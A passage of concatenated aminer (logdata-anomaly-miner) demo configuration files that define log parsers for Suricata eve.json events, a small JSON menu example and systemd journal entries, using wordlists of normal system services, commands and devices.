DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'ET POLICY Http Client Body contains pass= in cleartext' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Potential Corporate Privacy Violation' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: subject type: FixedDataModelElement name: 'subject' args: 'CN=mail.spiral.com' - id: issuerdn type: FixedDataModelElement name: 'issuerdn' args: 'CN=ChangeMe' - id: fingerprint type: FixedDataModelElement name: 'fingerprint' args: '4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17' - id: sni type: FixedDataModelElement name: 'sni' args: 'mail.spiral.com' - id: version type: FixedDataModelElement name: 'version' args: 'TLS 1.2' - id: notbefore type: DateTimeModelElement name: 'notbefore' date_format: '%Y-%m-%dT%H:%M:%S' - id: notafter type: DateTimeModelElement name: 'notafter' date_format: '%Y-%m-%dT%H:%M:%S' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp _flow_id: _flow_id _in_iface: _in_iface event_type: event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _icmp_type: _icmp_type _icmp_code: _icmp_code _dns: type: type id: id _rcode: _rcode rrname: rrname _rrtype: _rrtype _ttl: _ttl _tx_id: _tx_id _tx_id: _tx_id _http: hostname: hostname url: url http_user_agent: http_user_agent _http_content_type: _http_content_type _http_refer: _http_refer http_method: http_method protocol: protocol _redirect: _redirect _status: _status length: length _app_proto: _app_proto _app_proto_tc: _app_proto_tc _fileinfo: filename: url state: file_state stored: bool_wordlist size: size _tx_id: _tx_id _flow: pkts_toserver: pkts_toserver pkts_toclient: pkts_toclient bytes_toserver: bytes_toserver bytes_toclient: bytes_toclient start: start end: end age: age state: conn_state reason: reason alerted: bool_wordlist _stats: uptime: uptime capture: kernel_packets: kernel_packets kernel_drops: kernel_drops decoder: pkts: pkts bytes: bytes invalid: invalid ipv4: ipv4 ipv6: ipv6 ethernet: ethernet raw: raw null: null_counts sll: sll tcp: tcp udp: udp sctp: sctp icmpv4: icmpv4 icmpv6: icmpv6 ppp: ppp pppoe: pppoe gre: gre vlan: vlan vlan_qinq: vlan_qinq teredo: teredo ipv4_in_ipv6: ipv4_in_ipv6 ipv6_in_ipv6: ipv6_in_ipv6 mpls: mpls avg_pkt_size: avg_pkt_size max_pkt_size: max_pkt_size erspan: erspan ipraw: invalid_ip_version: invalid_ip_version ltnull: pkt_too_small: pkt_too_small unsupported_type: unsupported_type dce: pkt_too_small: pkt_too_small flow: memcap: memcap spare: spare emerg_mode_entered: emerg_mode_entered emerg_mode_over: emerg_mode_over tcp_reuse: tcp_reuse memuse: memuse defrag: ipv4: fragments: fragments reassembled: reassembled timeouts: timeouts ipv6: fragments: fragments reassembled: reassembled timeouts: timeouts max_frag_hits: max_frag_hits tcp: sessions: sessions ssn_memcap_drop: ssn_memcap_drop pseudo: pseudo pseudo_failed: pseudo_failed invalid_checksum: invalid_checksum no_flow: no_flow syn: syn synack: synack rst: rst segment_memcap_drop: segment_memcap_drop stream_depth_reached: stream_depth_reached reassembly_gap: reassembly_gap memuse: memuse reassembly_memuse: reassembly_memuse detect: alert: alert app_layer: flow: http: http ftp: ftp smtp: smtp tls: tls ssh: ssh imap: imap msn: msn smb: smb dcerpc_tcp: dcerpc_tcp dns_tcp: dns_tcp failed_tcp: failed_tcp dcerpc_udp: dcerpc_udp dns_udp: dns_udp failed_udp: failed_udp tx: http: http smtp: smtp tls: tls dns_tcp: dns_tcp dns_udp: dns_udp flow_mgr: closed_pruned: closed_pruned new_pruned: new_pruned est_pruned: est_pruned bypassed_pruned: bypassed_pruned flows_checked: flows_checked flows_notimeout: flows_notimeout flows_timeout: flows_timeout flows_timeout_inuse: flows_timeout_inuse flows_removed: flows_removed rows_checked: rows_checked rows_skipped: rows_skipped rows_empty: rows_empty rows_busy: rows_busy rows_maxlen: rows_maxlen dns: memuse: memuse memcap_state: memcap_state memcap_global: memcap_global http: memuse: memuse memcap: memcap _tcp: tcp_flags: tcp_flags tcp_flags_ts: tcp_flags_ts tcp_flags_tc: tcp_flags_tc syn: bool_wordlist _fin: bool_wordlist _rst: bool_wordlist _psh: bool_wordlist ack: bool_wordlist state: conn_state _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _tls: subject: subject issuerdn: issuerdn fingerprint: fingerprint sni: sni version: version notbefore: notbefore notafter: notafter Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-input-demo-config.yml000066400000000000000000000043671500476301700327070ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: id type: VariableByteDataModelElement name: 'id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: value type: VariableByteDataModelElement name: 'value' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: buttonNames type: FixedWordlistDataModelElement name: 'buttonNames' args: - 'New' - 'Open' - 'Close' - id: buttonOnclick type: FixedWordlistDataModelElement name: 'buttonOnclick' args: - 'CreateNewDoc()' - 'OpenDoc()' - 'CloseDoc()' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: menu: id: id value: value popup: menuitem: - value: buttonNames onclick: buttonOnclick Input: timestamp_paths: None json_format: True Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/menu/id/id" - "/model/menu/value/value" learn_mode: True output_logline: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/menu/id/id" - "/model/menu/value/value" learn_mode: True output_logline: True - type: SimpleUnparsedAtomHandler id: SimpleUnparsedAtomHandler EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-journal-demo.yml000066400000000000000000000765451500476301700317660ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/journal.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: delimiter type: DelimitedDataModelElement name: 'delimiter' delimiter: '=' consume_delimiter: true - id: hex type: HexStringModelElement name: 'hex' - id: __CURSOR type: SequenceModelElement name: '__CURSOR' args: - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - id: __REALTIME_TIMESTAMP type: DateTimeModelElement name: '__REALTIME_TIMESTAMP' date_format: '%s' - id: __MONOTONIC_TIMESTAMP type: DateTimeModelElement name: '__MONOTONIC_TIMESTAMP' date_format: '%s' - id: _BOOT_ID type: HexStringModelElement name: '_BOOT_ID' - id: optional_key__SOURCE_MONOTONIC_TIMESTAMP type: DateTimeModelElement name: 'optional_key__SOURCE_MONOTONIC_TIMESTAMP' date_format: '%s' - id: _TRANSPORT type: FixedWordlistDataModelElement name: '_TRANSPORT' args: - 'kernel' - 'stdout' - 'driver' - 'journal' - 'audit' - 'syslog' - id: optional_key_PRIORITY type: DecimalIntegerValueModelElement name: 'optional_key_PRIORITY' - id: optional_key__KERNEL_SUBSYSTEM type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_SUBSYSTEM' args: - 'acpi' - 'pci_bus' - 'pci' - 'ubs' - 'pnp' - 'scsi' - 'usb' - 'misc' - 'virtio' - 'hid' - id: optional_key__KERNEL_DEVICE type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_DEVICE' args: - '+acpi:PNP0A03:00' - '+pci_bus:0000:00' - '+pci:0000:00:00.0' - '+pci:0000:00:01.0' - '+pci:0000:00:01.1' - '+pci:0000:00:01.2' - '+pci:0000:00:01.3' - '+pci:0000:00:02.0' - '+pci:0000:00:03.0' - '+pci:0000:00:04.0' - '+pci:0000:00:05.0' - '+pnp:00:00' - '+pnp:00:01' - '+pnp:00:02' - '+pnp:00:03' - '+pnp:00:04' - '+scsi:host0' - '+scsi:host1' - 'c189:0' - '+usb:1-0:1.0' - '+usb:1-1' - 'c10:236' - '+virtio:virtio0' - 'c189:1' - '+hid:0003:0627:0001.0001' - id: optional_key__UDEV_DEVNODE type: FixedWordlistDataModelElement name: 'optional_key__UDEV_DEVNODE' args: - '/dev/bus/usb/001/001' - '/dev/bus/usb/001/002' - '/dev/mapper/control' - id: optional_key__UDEV_SYSNAME type: FixedWordlistDataModelElement name: 'optional_key__UDEV_SYSNAME' args: - 'PNP0A03:00' - 'usb1' - 'host0' - 'host1' - '00:00' - '00:01' - '00:02' - '00:03' - '00:04' - '0000:00:00.0' - '0000:00:01.0' - '0000:00:01.1' - '0000:00:01.2' - '0000:00:01.3' - '0000:00:02.0' - '0000:00:03.0' - '0000:00:04.0' - '0000:00:05.0' - '0000:00' - '1-0:1.0' - '1-1' - 'device-mapper' - 'virtio0' - '0003:0627:0001.0001' - id: SYSLOG_FACILITY type: DecimalIntegerValueModelElement name: 'SYSLOG_FACILITY' - id: optional_key_CODE_FILE type: FixedWordlistDataModelElement name: 'optional_key_CODE_FILE' args: - '../src/modules-load/modules-load.c' - '../src/core/unit.c' - '../src/udev/net/ethtool-util.c' - '../src/network/networkd.c' - '../src/resolve/resolved-dns-trust-anchor.c' - '../src/login/logind-seat.c' - '../src/core/manager.c' - '../src/login/logind-session.c' - '../src/core/job.c' - '../src/network/networkd-link.c' - '../src/timesync/timesyncd-manager.c' - '../src/network/networkd-dhcp6.c' - '../src/network/networkd-dhcp4.c' - '../src/resolve/resolved-manager.c' - '../src/network/wait-online/manager.c' - '../src/network/networkd-manager.c' - '../src/login/logind-button.c' - '../src/hostname/hostnamed.c' - '../src/resolve/resolved-dns-transaction.c' - id: optional_key_CODE_LINE type: DecimalIntegerValueModelElement name: 'optional_key_CODE_LINE' - id: optional_key_CODE_FUNC type: FixedWordlistDataModelElement name: 'optional_key_CODE_FUNC' args: - 'load_module' - 'unit_status_log_starting_stopping_reloading' - 'job_log_status_message' - 'ethtool_set_glinksettings' - 'main' - 'dns_trust_anchor_dump' - 'seat_start' - 'manager_notify_finished' - 'session_start' - 'link_update' - 'manager_network_event_handler' - 'link_ipv6ll_gained' - 'dhcp6_verify_link' - 'link_enable_ipv6' - 'dhcp_lease_acquired' - 'manager_watch_hostname' - 'link_enter_configured' - 'manager_all_configured' - 'manager_set_hostname' - 'button_open' - 'method_set_hostname' - 'manager_receive_response' - 'dns_transaction_process_reply' - id: optional_key_INTERFACE type: FixedWordlistDataModelElement name: 'optional_key_INTERFACE' args: - 'ens3' - 'lo' - id: SYSLOG_IDENTIFIER type: FixedWordlistDataModelElement name: 'SYSLOG_IDENTIFIER' args: - 'kernel' - 'stdout' - 'systemd-journald' - 'systemd-modules-load' - 'systemd-udevd' - 'systemd-networkd-wait-online' - 'systemd-timesyncd' - 'systemd-resolved' - 'systemd-networkd' - 'systemd-logind' - 'systemd-hostnamed' - 'systemd' - 'apparmor' - 'audit' - 'dhclient' - 'cloud-init' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - '/usr/sbin/irqbalance' - 'apport' - 'pollinate' - 'dbus-daemon' - 'polkitd' - 'grub-common' - 'lxcfs' - 'accounts-daemon' - 'networkd-dispatcher' - 'snapd' - 'sshd' - '/usr/bin/logger' - 'ec2' - 'sudo' - id: optional_key_SYSLOG_PID type: DecimalIntegerValueModelElement name: 'optional_key_SYSLOG_PID' - id: optional_key_MESSAGE_ID type: HexStringModelElement name: 'optional_key_MESSAGE_ID' - id: optional_key_SEAT_ID type: FixedWordlistDataModelElement name: 'optional_key_SEAT_ID' args: - 'seat0' - id: msg type: AnyByteDataModelElement name: 'msg' - id: MESSAGE type: OptionalMatchModelElement name: 'MESSAGE' args: msg - id: optional_key__MACHINE_ID type: HexStringModelElement name: 'optional_key__MACHINE_ID' - id: optional_key__HOSTNAME type: FixedWordlistDataModelElement name: 'optional_key__HOSTNAME' args: - 'ubuntu' - 'test-1' - id: optional_key__PID type: DecimalIntegerValueModelElement name: 'optional_key__PID' - id: optional_key__UID type: DecimalIntegerValueModelElement name: 'optional_key__UID' - id: optional_key__GID type: DecimalIntegerValueModelElement name: 'optional_key__GID' - id: optional_key__COMM type: FixedWordlistDataModelElement name: 'optional_key__COMM' args: - 'systemd-journal' - 'apparmor_parser' - 'apparmor' - 'systemd-udevd' - 'dhclient' - 'systemd-network' - 'systemd-timesyn' - 'systemd-resolve' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - 'dbus-daemon' - 'polkitd' - 'lxcfs' - 'accounts-daemon' - 'systemd-logind' - 'systemd-hostnam' - 'systemd' - 'networkd-dispat' - 'snapd' - 'sshd' - 'sudo' - 'cloud-init' - 'logger' - '(systemd)' - id: optional_key__EXE type: FixedWordlistDataModelElement name: 'optional_key__EXE' args: - '/lib/systemd/systemd-journald' - '/bin/dash' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient' - '/usr/bin/python3.6' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - '/usr/sbin/useradd' - '/usr/sbin/rsyslogd' - '/usr/bin/passwd' - '/usr/sbin/cron' - '/usr/bin/dbus-daemon' - '/usr/lib/policykit-1/polkitd' - '/usr/bin/lxcfs' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd' - '/usr/bin/logger' - '/usr/bin/sudo' - '/lib/systemd/systemd' - id: optional_key__CMDLINE type: FixedWordlistDataModelElement name: 'optional_key__CMDLINE' args: - '/lib/systemd/systemd-journald' - '/bin/sh /etc/init.d/apparmor start' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true' - '/usr/bin/python3 /usr/bin/cloud-init init --local' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=final' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - 'useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m' - '/usr/sbin/rsyslogd -n' - 'passwd -l ubuntu' - '/usr/sbin/cron -f' - '/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only' - '/usr/lib/policykit-1/polkitd --no-debug' - '/usr/bin/lxcfs /var/lib/lxcfs/' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd -D' - 'logger -p user info -t ec2 -s' - 'sudo -i' - '/sbin/init' - '/usr/bin/python3 /usr/bin/cloud-init init' - 'logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client successfully seeded [/dev/urandom]' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=config' - 'sshd: ubuntu [priv]' - '(systemd)' - '/lib/systemd/systemd --user' - id: optional_key__CAP_EFFECTIVE type: HexStringModelElement name: 'optional_key__CAP_EFFECTIVE' - id: optional_key__SELINUX_CONTEXT type: FixedWordlistDataModelElement name: 'optional_key__SELINUX_CONTEXT' args: - 'unconfined\n' - id: optional_key__SYSTEMD_CGROUP type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_CGROUP' args: - '/system.slice/systemd-journald.service' - '/system.slice/apparmor.service' - '/system.slice/systemd-udevd.service' - '/system.slice/cloud-init-local.service' - '/system.slice/systemd-networkd.service' - '/system.slice/systemd-timesyncd.service' - '/system.slice/systemd-resolved.service' - '/system.slice/systemd-networkd-wait-online.service' - '/system.slice/rsyslog.service' - '/system.slice/cron.service' - '/system.slice/dbus.service' - '/system.slice/polkit.service' - '/system.slice/lxcfs.service' - '/system.slice/accounts-daemon.service' - '/system.slice/systemd-logind.service' - '/system.slice/systemd-hostnamed.service' - '/system.slice/networkd-dispatcher.service' - '/system.slice/snapd.service' - '/system.slice/ssh.service' - '/system.slice/cloud-final.service' - '/system.slice/cloud-init.service' - '/system.slice/pollinate.service' - '/system.slice/cloud-config.service' - '/user.slice/user-1000.slice/session-1.scope' - '/init.scope' - '/user.slice/user-1000.slice/user@1000.service/init.scope' - '/user.slice/user-1000.slice/user@1000.service' - id: optional_key__SYSTEMD_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_UNIT' args: - 'systemd-journald.service' - 'systemd-networkd.service' - 'systemd-timesyncd.service' - 'systemd-resolved.service' - 'systemd-networkd-wait-online.service' - 'systemd-udevd.service' - 'systemd-logind.service' - 'systemd-hostnamed.service' - 'apparmor.service' - 'cloud-init-local.service' - 'rsyslog.service' - 'cron.service' - 'apport.service' - 'dbus.service' - 'polkit.service' - 'grub-common.service' - 'lxcfs.service' - 'accounts-daemon.service' - 'networkd-dispatcher.service' - 'snapd.service' - 'ssh.service' - 'cloud-final.service' - 'session-1.scope' - 'init.scope' - 'cloud-init.service' - 'pollinate.service' - 'cloud-config.service' - 'user@1000.service' - id: optional_key__SYSTEMD_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_SLICE' args: - 'system.slice' - '-.slice' - 'user-1000.slice' - id: optional_key__SYSTEMD_INVOCATION_ID type: HexStringModelElement name: 'optional_key__SYSTEMD_INVOCATION_ID' - id: optional_key_JOURNAL_NAME type: FixedWordlistDataModelElement name: 'optional_key_JOURNAL_NAME' args: - 'Runtime journal' - 'System journal' - id: fixed_journal_paths type: FixedWordlistDataModelElement name: 'fixed_journal_paths' args: - '/var/log/journal/' - '/run/log/journal/' - id: optional_key_JOURNAL_PATH type: SequenceModelElement name: 'optional_key_JOURNAL_PATH' args: - fixed_journal_paths - hex - id: optional_key_CURRENT_USE type: DecimalIntegerValueModelElement name: 'optional_key_CURRENT_USE' - id: float_number type: DecimalFloatValueModelElement name: 'float_number' - id: memory type: FixedWordlistDataModelElement name: 'memory' args: - 'M' - 'G' - 'K' - id: optional_key_CURRENT_USE_PRETTY type: SequenceModelElement name: 'optional_key_CURRENT_USE_PRETTY' args: - float_number - memory - id: optional_key_MAX_USE type: DecimalIntegerValueModelElement name: 'optional_key_MAX_USE' - id: optional_key_MAX_USE_PRETTY type: SequenceModelElement name: 'optional_key_MAX_USE_PRETTY' args: - float_number - memory - id: optional_key_DISK_KEEP_FREE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_KEEP_FREE' - id: optional_key_DISK_KEEP_FREE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_KEEP_FREE_PRETTY' args: - float_number - memory - id: optional_key_DISK_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_AVAILABLE' - id: optional_key_DISK_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key_LIMIT type: DecimalIntegerValueModelElement name: 'optional_key_LIMIT' - id: optional_key_LIMIT_PRETTY type: SequenceModelElement name: 'optional_key_LIMIT_PRETTY' args: - float_number - memory - id: optional_key_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_AVAILABLE' - id: optional_key_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key__SOURCE_REALTIME_TIMESTAMP type: DecimalIntegerValueModelElement name: 'optional_key__SOURCE_REALTIME_TIMESTAMP' - id: optional_key_JOB_TYPE type: FixedWordlistDataModelElement name: 'optional_key_JOB_TYPE' args: - 'start' - id: optional_key_JOB_RESULT type: FixedWordlistDataModelElement name: 'optional_key_JOB_RESULT' args: - 'done' - id: optional_key_UNIT type: FixedWordlistDataModelElement name: 'optional_key_UNIT' args: - 'systemd-udevd.service' - 'systemd-journal-flush.service' - 'systemd-sysctl.service' - 'systemd-udev-trigger.service' - 'systemd-machine-id-commit.service' - 'systemd-update-utmp.service' - 'systemd-ask-password-console.path' - 'systemd-tmpfiles-setup.service' - 'systemd-timesyncd.service' - 'systemd-networkd.service' - 'systemd-networkd-wait-online.service' - 'systemd-resolved.service' - 'systemd-tmpfiles-clean.timer' - 'systemd-logind.service' - 'systemd-user-sessions.service' - 'systemd-hostnamed.service' - 'systemd-update-utmp-runlevel.service' - 'network-online.target' - 'keyboard-setup.service' - 'cryptsetup.target' - 'local-fs-pre.target' - 'dev-ttyS0.device' - 'systemd-rfkill.socket' - 'dev-disk-by-label-UEFI.device' - 'boot-efi.mount' - 'local-fs.target' - 'plymouth-read-write.service' - 'console-setup.service' - 'ebtables.service' - 'apparmor.service' - 'time-sync.target' - 'cloud-init-local.service' - 'network-pre.target' - 'nss-lookup.target' - 'network.target' - 'cloud-init.service' - 'blk-availability.service' - 'remote-fs-pre.target' - 'remote-fs.target' - 'cloud-config.target' - 'sysinit.target' - 'uuidd.socket' - 'snapd.socket' - 'motd-news.timer' - 'dbus.socket' - 'apt-daily.timer' - 'apt-daily-upgrade.timer' - 'lxd.socket' - 'iscsid.socket' - 'fstrim.timer' - 'timers.target' - 'acpid.path' - 'acpid.socket' - 'paths.target' - 'basic.target' - 'lxd-containers.service' - 'atd.service' - 'cron.service' - 'sockets.target' - 'networkd-dispatcher.service' - 'apport.service' - 'irqbalance.service' - 'rsyslog.service' - 'accounts-daemon.service' - 'pollinate.service' - 'grub-common.service' - 'lxcfs.service' - 'dbus.service' - 'snapd.service' - 'polkit.service' - 'unattended-upgrades.service' - 'plymouth-quit.service' - 'plymouth-quit-wait.service' - 'serial-getty@ttyS0.service' - 'setvtrgb.service' - 'system-getty.slice' - 'getty@tty1.service' - 'getty.target' - 'ssh.service' - 'snapd.seeded.service' - 'cloud-config.service' - 'multi-user.target' - 'graphical.target' - 'cloud-final.service' - 'cloud-init.target' - 'user-1000.slice' - 'user@1000.service' - 'session-1.scope' - id: optional_key_INVOCATION_ID type: HexStringModelElement name: 'optional_key_INVOCATION_ID' - id: optional_key__STREAM_ID type: HexStringModelElement name: 'optional_key__STREAM_ID' - id: optional_key__AUDIT_TYPE type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_TYPE' - id: optional_key__AUDIT_ID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_ID' - id: optional_key__AUDIT_FIELD_APPARMOR type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_APPARMOR' args: - '"STATUS"' - id: optional_key__AUDIT_FIELD_OPERATION type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_OPERATION' args: - '"profile_load"' - id: optional_key__AUDIT_FIELD_PROFILE type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_PROFILE' args: - '"unconfined"' - id: optional_key__AUDIT_FIELD_NAME type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_NAME' args: - 'lxc-container-default-cgns' - 'lxc-container-default-with-mounting' - 'lxc-container-default-with-nesting' - 'lxc-container-default' - '/usr/lib/NetworkManager/nm-dhcp-client.action' - '/usr/lib/NetworkManager/nm-dhcp-helper' - '/usr/lib/connman/scripts/dhclient-script' - '/usr/lib/snapd/snap-confine//mount-namespace-capture-helper' - '/usr/bin/lxc-start' - '/usr/bin/man' - '/usr/lib/snapd/snap-confine' - '/usr/sbin/tcpdump' - 'man_filter' - 'man_groff' - '/sbin/dhclient' - id: optional_key_ADDRESS type: IpAddressDataModelElement name: 'optional_key_ADDRESS' - id: optional_key_PREFIXLEN type: DecimalIntegerValueModelElement name: 'optional_key_PREFIXLEN' - id: optional_key_GATEWAY type: IpAddressDataModelElement name: 'optional_key_GATEWAY' - id: optional_key__AUDIT_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_SESSION' - id: optional_key__AUDIT_LOGINUID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_LOGINUID' - id: optional_key_SESSION_ID type: DecimalIntegerValueModelElement name: 'optional_key_SESSION_ID' - id: optional_key_USER_ID type: FixedWordlistDataModelElement name: 'optional_key_USER_ID' args: - 'ubuntu' - id: optional_key_LEADER type: DecimalIntegerValueModelElement name: 'optional_key_LEADER' - id: optional_key_KERNEL_USEC type: DecimalIntegerValueModelElement name: 'optional_key_KERNEL_USEC' - id: optional_key_USERSPACE_USEC type: DecimalIntegerValueModelElement name: 'optional_key_USERSPACE_USEC' - id: optional_key__SYSTEMD_OWNER_UID type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_OWNER_UID' - id: optional_key_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key_USER_UNIT' args: - 'gpg-agent-ssh.socket' - 'gpg-agent-browser.socket' - 'gpg-agent-extra.socket' - 'paths.target' - 'dirmngr.socket' - 'gpg-agent.socket' - 'sockets.target' - 'basic.target' - 'default.target' - 'timers.target' - id: optional_key_USER_INVOCATION_ID type: HexStringModelElement name: 'optional_key_USER_INVOCATION_ID' - id: optional_key__SYSTEMD_USER_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_SLICE' args: - '-.slice' - id: optional_key__SYSTEMD_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_UNIT' args: - 'init.scope' - 'cloud-config.service' - id: optional_key__SYSTEMD_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_SESSION' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: __CURSOR: __CURSOR __REALTIME_TIMESTAMP: __REALTIME_TIMESTAMP __MONOTONIC_TIMESTAMP: __MONOTONIC_TIMESTAMP _BOOT_ID: _BOOT_ID optional_key__SOURCE_MONOTONIC_TIMESTAMP: optional_key__SOURCE_MONOTONIC_TIMESTAMP _TRANSPORT: _TRANSPORT optional_key_PRIORITY: optional_key_PRIORITY optional_key__KERNEL_SUBSYSTEM: optional_key__KERNEL_SUBSYSTEM optional_key__KERNEL_DEVICE: optional_key__KERNEL_DEVICE optional_key__UDEV_DEVNODE: optional_key__UDEV_DEVNODE optional_key__UDEV_SYSNAME: optional_key__UDEV_SYSNAME SYSLOG_FACILITY: SYSLOG_FACILITY optional_key_CODE_FILE: optional_key_CODE_FILE optional_key_CODE_LINE: optional_key_CODE_LINE optional_key_CODE_FUNC: optional_key_CODE_FUNC optional_key_INTERFACE: optional_key_INTERFACE SYSLOG_IDENTIFIER: SYSLOG_IDENTIFIER optional_key_SYSLOG_PID: optional_key_SYSLOG_PID optional_key_MESSAGE_ID: optional_key_MESSAGE_ID optional_key_SEAT_ID: optional_key_SEAT_ID MESSAGE: MESSAGE optional_key__MACHINE_ID: optional_key__MACHINE_ID optional_key__HOSTNAME: optional_key__HOSTNAME optional_key__PID: optional_key__PID optional_key__UID: optional_key__UID optional_key__GID: optional_key__GID optional_key__COMM: optional_key__COMM optional_key__EXE: optional_key__EXE optional_key__CMDLINE: optional_key__CMDLINE optional_key__CAP_EFFECTIVE: optional_key__CAP_EFFECTIVE optional_key__SELINUX_CONTEXT: optional_key__SELINUX_CONTEXT optional_key__SYSTEMD_CGROUP: optional_key__SYSTEMD_CGROUP optional_key__SYSTEMD_UNIT: optional_key__SYSTEMD_UNIT optional_key__SYSTEMD_SLICE: optional_key__SYSTEMD_SLICE optional_key__SYSTEMD_INVOCATION_ID: optional_key__SYSTEMD_INVOCATION_ID optional_key_JOURNAL_NAME: optional_key_JOURNAL_NAME optional_key_JOURNAL_PATH: optional_key_JOURNAL_PATH optional_key_CURRENT_USE: optional_key_CURRENT_USE optional_key_CURRENT_USE_PRETTY: optional_key_CURRENT_USE_PRETTY optional_key_MAX_USE: optional_key_MAX_USE optional_key_MAX_USE_PRETTY: optional_key_MAX_USE_PRETTY optional_key_DISK_KEEP_FREE: optional_key_DISK_KEEP_FREE optional_key_DISK_KEEP_FREE_PRETTY: optional_key_DISK_KEEP_FREE_PRETTY optional_key_DISK_AVAILABLE: optional_key_DISK_AVAILABLE optional_key_DISK_AVAILABLE_PRETTY: optional_key_DISK_AVAILABLE_PRETTY optional_key_LIMIT: optional_key_LIMIT optional_key_LIMIT_PRETTY: optional_key_LIMIT_PRETTY optional_key_AVAILABLE: optional_key_AVAILABLE 